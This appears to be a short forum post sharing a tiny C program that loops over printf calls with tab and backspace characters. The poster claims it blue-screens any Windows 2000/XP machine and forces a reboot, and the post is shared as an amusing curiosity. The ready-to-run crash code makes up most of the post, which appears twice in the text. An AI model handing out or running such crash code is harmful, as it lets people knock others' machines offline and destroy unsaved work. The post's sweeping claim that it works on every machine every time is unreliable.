- Jan 9, 2000
- 1,827
- 0
- 0
#include <stdio.h>
void main(void) {
for(int i = 0; i < 5 ; i++)
printf("\t\t\b\b\b");
}
the following user level code will BSOD any Win2K/XP machine, forcing a reboot.
source ArsTechnica Forums
I did some research and found a more complete description of the problem over here.
I find it amusing that a user level program can blow away the OS, every time
sorry if this is a repost
void main(void) {
for(int i = 0; i < 5 ; i++)
printf("\t\t\b\b\b");
}
the following user level code will BSOD any Win2K/XP machine, forcing a reboot.
source ArsTechnica Forums
I did some research and found a more complete description of the problem over here.
I find it amusing that a user level program can blow away the OS, every time
sorry if this is a repost
